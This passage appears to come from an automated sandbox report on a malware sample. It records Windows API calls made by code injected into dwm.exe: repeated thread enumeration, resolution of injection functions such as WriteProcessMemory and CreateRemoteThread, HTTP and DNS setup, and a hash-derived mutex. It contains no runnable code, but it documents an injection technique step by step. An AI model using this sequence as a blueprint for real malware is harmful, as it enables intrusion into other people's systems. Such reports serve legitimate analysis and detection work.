(hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.170] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.170] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.171] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.171] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.171] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.172] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.172] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.172] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.172] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.173] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.173] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.173] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.174] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.174] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.174] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.174] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.175] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.175] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.175] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.176] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.176] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.176] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.176] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.177] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.177] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.177] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.178] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.178] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.178] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.179] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.179] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.179] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.179] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.180] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.180] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.181] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.181] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.181] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.182] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.182] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.182] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.182] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.183] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.183] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.183] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.184] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.184] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.184] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.184] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.185] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.185] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.185] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.185] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.186] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.240] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.240] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.240] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.240] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.241] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.241] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.241] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.242] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.242] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.242] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.243] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.243] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.243] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.243] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.244] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.244] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.244] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.245] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.245] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.245] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.245] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.246] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.246] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.246] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.247] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.247] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.247] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.247] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.248] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.248] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.248] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.248] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.263] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x5b0) returned 0x8c [0166.263] ResumeThread (hThread=0x8c) returned 0x1 [0166.263] CloseHandle (hObject=0x8c) returned 1 [0166.264] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9d4) returned 0x8c [0166.264] ResumeThread (hThread=0x8c) returned 0x1 [0166.264] CloseHandle (hObject=0x8c) returned 1 [0166.433] CloseHandle (hObject=0x88) returned 1 [0166.433] VirtualQuery (in: lpAddress=0x5f09c8, lpBuffer=0x20dfe7c, dwLength=0x1c | out: lpBuffer=0x20dfe7c*(BaseAddress=0x5f0000, AllocationBase=0x5d0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0166.433] GetProcessHeap () returned 0x5d0000 [0166.433] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5f09c8 | out: hHeap=0x5d0000) returned 1 [0166.433] VirtualQuery (in: lpAddress=0x5f08b8, lpBuffer=0x20dfe7c, dwLength=0x1c | out: lpBuffer=0x20dfe7c*(BaseAddress=0x5f0000, AllocationBase=0x5d0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0166.433] GetProcessHeap () returned 0x5d0000 [0166.433] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5f08b8 | out: hHeap=0x5d0000) returned 1 [0166.433] RtlExitUserThread (Status=0x0) Process: id = "20" image_name = "dwm.exe" filename = "c:\\windows\\system32\\dwm.exe" page_root = "0x805b000" os_pid = "0x448" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "18" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\system32\\Dwm.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 208 os_tid = 0xbbc Thread: id = 209 os_tid = 0x9fc Thread: id = 210 os_tid = 0x464 Thread: id = 211 os_tid = 0x458 Thread: id = 212 os_tid = 0x44c Thread: id = 213 os_tid = 0xa0c [0165.488] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76e30000 [0165.488] GetProcAddress (hModule=0x76e30000, lpProcName="Sleep") returned 0x76e52b70 [0165.489] GetProcAddress (hModule=0x76e30000, lpProcName="ReadProcessMemory") returned 0x76e7bdc0 [0165.489] GetProcAddress (hModule=0x76e30000, lpProcName="Thread32Next") returned 0x76e7a980 [0165.489] GetProcAddress (hModule=0x76e30000, lpProcName="lstrcatA") returned 0x76e7e110 [0165.489] GetProcAddress (hModule=0x76e30000, lpProcName="ExitThread") returned 0x76f96930 [0165.489] GetProcAddress (hModule=0x76e30000, lpProcName="MultiByteToWideChar") returned 0x76e45b50 [0165.489] GetProcAddress (hModule=0x76e30000, lpProcName="RtlMoveMemory") returned 0x76e526d8 [0165.489] GetProcAddress (hModule=0x76e30000, lpProcName="GetLastError") returned 0x76e52dd0 [0165.489] GetProcAddress (hModule=0x76e30000, lpProcName="lstrcmpiA") returned 0x76e340a0 [0165.489] GetProcAddress (hModule=0x76e30000, lpProcName="GetProcAddress") returned 0x76e53690 [0165.489] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualAlloc") returned 0x76e467a0 [0165.489] GetProcAddress (hModule=0x76e30000, lpProcName="LoadLibraryA") returned 0x76e47070 [0165.489] GetProcAddress (hModule=0x76e30000, lpProcName="OpenThread") returned 0x76e4c560 [0165.490] GetProcAddress (hModule=0x76e30000, lpProcName="Process32Next") returned 0x76e8fcc0 [0165.490] GetProcAddress (hModule=0x76e30000, lpProcName="GetModuleFileNameA") returned 0x76e464a0 [0165.490] GetProcAddress (hModule=0x76e30000, lpProcName="GetModuleHandleA") returned 0x76e465e0 [0165.490] GetProcAddress (hModule=0x76e30000, lpProcName="CreateMutexA") returned 0x76e47210 [0165.490] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualProtect") returned 0x76e32ef0 [0165.490] GetProcAddress (hModule=0x76e30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e321e0 [0165.490] GetProcAddress (hModule=0x76e30000, lpProcName="GetCurrentThreadId") returned 0x76e43ee0 [0165.490] GetProcAddress (hModule=0x76e30000, lpProcName="CloseHandle") returned 0x76e52f80 [0165.490] GetProcAddress (hModule=0x76e30000, lpProcName="GetCurrentProcessId") returned 0x76e45a50 [0165.490] GetProcAddress (hModule=0x76e30000, lpProcName="WriteProcessMemory") returned 0x76e7bad0 [0165.490] GetProcAddress (hModule=0x76e30000, lpProcName="SuspendThread") returned 0x76e32f60 [0165.491] GetProcAddress (hModule=0x76e30000, lpProcName="ResumeThread") returned 0x76e413a0 [0165.491] GetProcAddress (hModule=0x76e30000, lpProcName="RtlZeroMemory") returned 0x76fa2eb0 [0165.491] GetProcAddress (hModule=0x76e30000, lpProcName="Thread32First") returned 0x76e7aa70 [0165.491] GetProcAddress (hModule=0x76e30000, lpProcName="CreateRemoteThread") returned 0x76e7c4f0 [0165.491] GetProcAddress (hModule=0x76e30000, lpProcName="OpenProcess") returned 0x76e4cad0 [0165.491] GetProcAddress (hModule=0x76e30000, lpProcName="GetProcessHeap") returned 0x76e53050 [0165.491] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualFree") returned 0x76e41260 [0165.491] GetProcAddress (hModule=0x76e30000, lpProcName="Process32First") returned 0x76e8fdb0 [0165.491] GetProcAddress (hModule=0x76e30000, lpProcName="HeapFree") returned 0x76e53070 [0165.491] GetProcAddress (hModule=0x76e30000, lpProcName="HeapAlloc") returned 0x76fa33a0 [0165.492] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualQuery") returned 0x76e4bd40 [0165.492] GetProcAddress (hModule=0x76e30000, lpProcName="lstrlenA") returned 0x76e4caf0 [0165.492] GetProcAddress (hModule=0x76e30000, lpProcName="IsWow64Process") returned 0x76e391d0 [0165.492] GetProcAddress (hModule=0x76e30000, lpProcName="HeapReAlloc") returned 0x76f83f20 [0165.492] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x7fefdbf0000 [0165.492] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptDestroyHash") returned 0x7fefdbfdb00 [0165.492] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptReleaseContext") returned 0x7fefdbfdd10 [0165.492] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptHashData") returned 0x7fefdbfdac0 [0165.492] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptGetHashParam") returned 0x7fefdbfdb20 [0165.493] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptCreateHash") returned 0x7fefdbfdad4 [0165.493] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptAcquireContextA") returned 0x7fefdbf8180 [0165.493] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x7fefd080000 [0165.493] GetProcAddress (hModule=0x7fefd080000, lpProcName="CryptStringToBinaryA") returned 0x7fefd0ce59c [0165.493] GetProcAddress (hModule=0x7fefd080000, lpProcName="CryptBinaryToStringA") returned 0x7fefd0b4220 [0165.493] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x7fefc5b0000 [0165.503] GetProcAddress (hModule=0x7fefc5b0000, lpProcName="DnsFree") returned 0x7fefc5b1e74 [0165.503] GetProcAddress (hModule=0x7fefc5b0000, lpProcName="DnsQuery_W") returned 0x7fefc5c01b0 [0165.504] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76f50000 [0165.504] GetProcAddress (hModule=0x76f50000, lpProcName="NtCreateSection") returned 0x76fa17b0 [0165.504] GetProcAddress (hModule=0x76f50000, lpProcName="NtSetInformationProcess") returned 0x76fa14d0 [0165.504] GetProcAddress (hModule=0x76f50000, lpProcName="NtMapViewOfSection") returned 0x76fa1590 [0165.504] GetProcAddress (hModule=0x76f50000, lpProcName="LdrProcessRelocationBlock") returned 0x76ffb110 [0165.504] GetProcAddress (hModule=0x76f50000, lpProcName="NtUnmapViewOfSection") returned 0x76fa15b0 [0165.504] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76d30000 [0165.504] GetProcAddress (hModule=0x76d30000, lpProcName="wsprintfW") returned 0x76d5099c [0165.504] GetProcAddress (hModule=0x76d30000, lpProcName="wsprintfA") returned 0x76dabae8 [0165.505] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x7fef7150000 [0165.507] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpReadData") returned 0x7fef715e1e0 [0165.508] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpAddRequestHeaders") returned 0x7fef716bdcc [0165.508] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpCrackUrl") returned 0x7fef715ba38 [0165.508] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpGetProxyForUrl") returned 0x7fef715e9c0 [0165.508] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpOpenRequest") returned 0x7fef71545f8 [0165.508] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpOpen") returned 0x7fef7153428 [0165.508] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpCloseHandle") returned 0x7fef71522e0 [0165.508] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpSendRequest") returned 0x7fef71574d0 [0165.508] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7fef716a56c [0165.509] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpSetOption") returned 0x7fef71539c4 [0165.509] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpReceiveResponse") returned 0x7fef715d068 [0165.509] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpConnect") returned 0x7fef7163e3c [0165.509] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x7fefe260000 [0165.509] GetProcAddress (hModule=0x7fefe260000, lpProcName=0xc) returned 0x7fefe26d9a0 [0165.509] GetProcAddress (hModule=0x7fefe260000, lpProcName=0x5) returned 0x7fefe28e450 [0165.509] GetProcAddress (hModule=0x7fefe260000, lpProcName=0xf) returned 0x7fefe261250 [0165.509] VirtualProtect (in: lpAddress=0x1fa0000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x284fc30 | out: lpflOldProtect=0x284fc30*=0x40) returned 1 [0165.510] VirtualProtect (in: lpAddress=0x1fa0000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x284fc30 | out: lpflOldProtect=0x284fc30*=0x4) returned 1 [0165.511] VirtualQuery (in: lpAddress=0x2030023, lpBuffer=0x284fbc0, dwLength=0x30 | out: lpBuffer=0x284fbc0*(BaseAddress=0x2030000, AllocationBase=0x2030000, AllocationProtect=0x40, __alignment1=0xfffff880, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000, __alignment2=0x0)) returned 0x30 [0165.511] GetProcessHeap () returned 0x2a0000 [0165.511] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x364) returned 0x2dcea0 [0165.511] RtlMoveMemory (in: Destination=0x2dcea0, Source=0x2030023, Length=0x363 | out: Destination=0x2dcea0) [0165.511] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x2030023) returned 0x0 [0165.511] GetCurrentProcessId () returned 0x448 [0165.511] GetProcessHeap () returned 0x2a0000 [0165.511] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x105) returned 0x2ea8f0 [0165.511] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2ea8f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Dwm.exe" (normalized: "c:\\windows\\system32\\dwm.exe")) returned 0x1b [0165.511] GetProcessHeap () returned 0x2a0000 [0165.511] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x105) returned 0x2eaad0 [0165.511] GetCurrentProcessId () returned 0x448 [0165.511] wsprintfA (in: param_1=0x2eaad0, param_2="%s%d%d%d" | out: param_1="C:\\Windows\\system32\\Dwm.exe37084212410963") returned 41 [0165.511] CryptAcquireContextA (in: phProv=0x284fb80, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x284fb80*=0x2dd380) returned 1 [0165.610] CryptCreateHash (in: hProv=0x2dd380, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x284fbd8 | out: phHash=0x284fbd8) returned 1 [0165.610] lstrlenA (lpString="C:\\Windows\\system32\\Dwm.exe37084212410963") returned 41 [0165.610] CryptHashData (hHash=0x2d8460, pbData=0x2eaad0, dwDataLen=0x29, dwFlags=0x0) returned 1 [0165.610] CryptGetHashParam (in: hHash=0x2d8460, dwParam=0x2, pbData=0x284fb88, pdwDataLen=0x284fbd0, dwFlags=0x0 | out: pbData=0x284fb88, pdwDataLen=0x284fbd0) returned 1 [0165.610] wsprintfA (in: param_1=0x2eaad0, param_2="%02X" | out: param_1="2E") returned 2 [0165.610] wsprintfA (in: param_1=0x2eaad2, param_2="%02X" | out: param_1="7B") returned 2 [0165.610] wsprintfA (in: param_1=0x2eaad4, param_2="%02X" | out: param_1="8F") returned 2 [0165.610] wsprintfA (in: param_1=0x2eaad6, param_2="%02X" | out: param_1="5B") returned 2 [0165.610] wsprintfA (in: param_1=0x2eaad8, param_2="%02X" | out: param_1="9E") returned 2 [0165.610] wsprintfA (in: param_1=0x2eaada, param_2="%02X" | out: param_1="60") returned 2 [0165.610] wsprintfA (in: param_1=0x2eaadc, param_2="%02X" | out: param_1="9D") returned 2 [0165.610] wsprintfA (in: param_1=0x2eaade, param_2="%02X" | out: param_1="10") returned 2 [0165.611] wsprintfA (in: param_1=0x2eaae0, param_2="%02X" | out: param_1="56") returned 2 [0165.611] wsprintfA (in: param_1=0x2eaae2, param_2="%02X" | out: param_1="CE") returned 2 [0165.611] wsprintfA (in: param_1=0x2eaae4, param_2="%02X" | out: param_1="58") returned 2 [0165.611] wsprintfA (in: param_1=0x2eaae6, param_2="%02X" | out: param_1="9A") returned 2 [0165.611] wsprintfA (in: param_1=0x2eaae8, param_2="%02X" | out: param_1="98") returned 2 [0165.611] wsprintfA (in: param_1=0x2eaaea, param_2="%02X" | out: param_1="1F") returned 2 [0165.611] wsprintfA (in: param_1=0x2eaaec, param_2="%02X" | out: param_1="78") returned 2 [0165.611] wsprintfA (in: param_1=0x2eaaee, param_2="%02X" | out: param_1="61") returned 2 [0165.611] CryptDestroyHash (hHash=0x2d8460) returned 1 [0165.611] CryptReleaseContext (hProv=0x2dd380, dwFlags=0x0) returned 1 [0165.611] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="2E7B8F5B9E609D1056CE589A981F7861") returned 0xf8 [0165.611] GetLastError () returned 0x0 [0165.611] Sleep (dwMilliseconds=0x1f4) [0166.204] GetCurrentProcessId () returned 0x448 [0166.204] GetCurrentThreadId () returned 0xa0c [0166.204] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0xdc [0166.206] Thread32First (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.207] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.207] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.207] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.208] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.208] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.208] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.208] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.209] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.209] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.209] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.210] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.210] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.210] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.211] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.211] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.211] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.212] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.212] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.212] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.212] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.213] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.213] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.213] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.214] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.214] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.214] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.215] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.215] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.215] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.215] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.216] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.218] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.218] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.218] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.219] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.219] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.219] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.220] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.220] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.220] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.221] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.221] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.221] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.221] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.222] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.222] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.222] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.223] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.223] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.223] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.223] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.224] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.224] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.224] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.225] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.225] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.225] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.225] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.226] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.226] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.227] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.227] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.227] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.227] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.228] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.228] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.228] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.229] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.229] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.229] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.230] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.230] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.230] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.230] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.231] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.231] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.231] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.232] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.232] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.232] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.233] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.233] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.233] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.233] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.234] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.234] Thread32Next 